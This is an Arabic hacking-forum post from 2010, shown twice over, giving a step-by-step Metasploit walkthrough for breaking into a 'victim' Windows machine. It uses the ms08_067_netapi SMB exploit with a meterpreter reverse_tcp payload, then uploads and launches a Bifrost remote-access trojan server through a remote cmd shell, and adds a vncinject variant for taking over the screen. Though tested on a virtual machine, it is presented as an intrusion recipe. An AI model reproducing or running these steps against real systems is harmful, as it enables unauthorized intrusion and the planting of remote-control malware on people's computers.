سحابة الكلمات الدلالية
إختراق الضحية بالميتا ورفع سيرفر بيفروست
صفحة 1 من اصل 1
إختراق الضحية بالميتا ورفع سيرفر بيفروست
من طرف razak الأحد يونيو 13, 2010 6:51 am
السلام عليكم و رحمة الله و بركاته
وأنا أفكر طرأت لي فكرة لا أعرف إن كانت طرحت بعد المهم هي إختراق الضحية بالميتا ورفع سيرفر بيفروست هي المعلومة مش جديدة بس معلومة للي ما يعرفها وكما
سأتحدث عن سيطرة الجهاز بإستخدام playoad windows/vncinject
وسأجربها علي جهاز إفتراضي كفانا من الكلام ولنبدأ.
نقرتين لعرض الصورة في صفحة مستقلة
إضغط علي window وبعد ذلك علي console ستفتح لنا
النافذة التالية نكتب show exploits
نقرتين لعرض الصورة في صفحة مستقلة
ونختار windows/smb/ms08_067_netapi
show payloads
نقرتين لعرض الصورة في صفحة مستقلة
ونختار windows/meterpreter/reverse_tcp
أو نختارها مباشرة كما ف الصورة
نقرتين لعرض الصورة في صفحة مستقلة
والآن نقوم بتحديد IP الضحية وهو في هذه الحالة جهازي الإفتراضي RHOST = 192.168.56.101
ولا تنسي أن تضع رقم جهازك LHOST =192.168.56.1 لتطبيق الثغرة نكتب exploit وبعد ذلك enter
نقرتين لعرض الصورة في صفحة مستقلة
كما ترون في الصورة لقد نجحنا في تطبيق الثغرة والدخول لي الجهاز عن طريق port 445
************************************************** **********************
لنري خيارات نكتب help والآن سنقوم برفع السيرفر بالأمر upload -r server.exe c:\
كما في الصورة التالية ولكن قبل تحميل السيرفر يجب نسخه في مجلد
C:\Program Files\****sploit\Framework3
نقرتين لعرض الصورة في صفحة مستقلة
************************************************** ***********************
بعد رفع السيرفر نشغل برنامج الدوس للضحية بالأوامرالتالية:
use -m process
execute -f cmd.exe -c
interact 3
كما في الصورة حسب رقم channel أو session المفتوح
نقرتين لعرض الصورة في صفحة مستقلة
لتشغيل السيرفر start server.exe
************************************************** ************************
وكما توضح الصورة نجاح تحميل السيرفر
نقرتين لعرض الصورة في صفحة مستقلة
والصور تعبر عن نفسها
نقرتين لعرض الصورة في صفحة مستقلة
شاشة الضحية
نقرتين لعرض الصورة في صفحة مستقلة
لتطبيق payload windows/vncinject نقوم بنفس الخطوات السابقة ولكن بإستبدال
windows/meterpreter/smb/ms08_067_netapi
set windows/vncinject/reverse_tcp
بتطبيق الثغرة ستفتح لنا الشاشة التالية
نقرتين لعرض الصورة في صفحة مستقلة
و بكده نقدر نقول تم بحمد الله
وأنا أفكر طرأت لي فكرة لا أعرف إن كانت طرحت بعد المهم هي إختراق الضحية بالميتا ورفع سيرفر بيفروست هي المعلومة مش جديدة بس معلومة للي ما يعرفها وكما
سأتحدث عن سيطرة الجهاز بإستخدام playoad windows/vncinject
وسأجربها علي جهاز إفتراضي كفانا من الكلام ولنبدأ.
نقرتين لعرض الصورة في صفحة مستقلة
إضغط علي window وبعد ذلك علي console ستفتح لنا
النافذة التالية نكتب show exploits
نقرتين لعرض الصورة في صفحة مستقلة
ونختار windows/smb/ms08_067_netapi
show payloads
نقرتين لعرض الصورة في صفحة مستقلة
ونختار windows/meterpreter/reverse_tcp
أو نختارها مباشرة كما ف الصورة
نقرتين لعرض الصورة في صفحة مستقلة
والآن نقوم بتحديد IP الضحية وهو في هذه الحالة جهازي الإفتراضي RHOST = 192.168.56.101
ولا تنسي أن تضع رقم جهازك LHOST =192.168.56.1 لتطبيق الثغرة نكتب exploit وبعد ذلك enter
نقرتين لعرض الصورة في صفحة مستقلة
كما ترون في الصورة لقد نجحنا في تطبيق الثغرة والدخول لي الجهاز عن طريق port 445
************************************************** **********************
لنري خيارات نكتب help والآن سنقوم برفع السيرفر بالأمر upload -r server.exe c:\
كما في الصورة التالية ولكن قبل تحميل السيرفر يجب نسخه في مجلد
C:\Program Files\****sploit\Framework3
نقرتين لعرض الصورة في صفحة مستقلة
************************************************** ***********************
بعد رفع السيرفر نشغل برنامج الدوس للضحية بالأوامرالتالية:
use -m process
execute -f cmd.exe -c
interact 3
كما في الصورة حسب رقم channel أو session المفتوح
نقرتين لعرض الصورة في صفحة مستقلة
لتشغيل السيرفر start server.exe
************************************************** ************************
وكما توضح الصورة نجاح تحميل السيرفر
نقرتين لعرض الصورة في صفحة مستقلة
والصور تعبر عن نفسها
نقرتين لعرض الصورة في صفحة مستقلة
شاشة الضحية
نقرتين لعرض الصورة في صفحة مستقلة
لتطبيق payload windows/vncinject نقوم بنفس الخطوات السابقة ولكن بإستبدال
windows/meterpreter/smb/ms08_067_netapi
set windows/vncinject/reverse_tcp
بتطبيق الثغرة ستفتح لنا الشاشة التالية
نقرتين لعرض الصورة في صفحة مستقلة
و بكده نقدر نقول تم بحمد الله
razak- عدد المساهمات : 640
نقاط : 1917
السٌّمعَة : 1
تاريخ التسجيل : 01/04/2010
العمر : 34
الموقع : www.fail.yoo7.com -
صفحة 1 من اصل 1
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى